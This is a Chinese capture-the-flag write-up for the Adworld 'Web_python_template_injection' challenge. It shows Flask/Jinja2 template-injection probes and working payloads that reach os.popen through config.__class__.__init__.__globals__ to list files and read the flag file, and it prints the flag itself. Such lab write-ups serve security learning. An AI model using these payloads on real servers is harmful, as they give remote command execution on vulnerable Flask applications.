攻防世界 web进阶区 Web_python_template_injection
通过观察题目,这是一个和python的flask模板漏洞有关的题,打开链接
直接尝试使用flask模板的漏洞试试,构造的payload为:/{{2*3}}
通过下图的观察,确实存在这样的漏洞。
然后查看config文件,测试配置文件是否有被禁用,可以看到,配置文件包并没有被禁用。
构造的payload为:/{{config}}
config文件没有被禁用,接下来就简单了,直接查看服务器的本地文件有哪些,构造的的payload为:
/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
此处我解释下上面的这个payload:
class:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。
init 初始化类,返回的类型是function
globals[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
os.popen() 方法用于从一个命令打开一个管道。
得到如下信息,看到了fl4g,该文件中应该就保存了flag的相关信息
读取fl4g的相关内容信息,直接得到flag
构造的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}
最终的flag为:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}
文章仅限于个人对该题的理解,可能有些地方不对,希望网友发现错误之后能够及时评论给予改正。非常的感谢大家。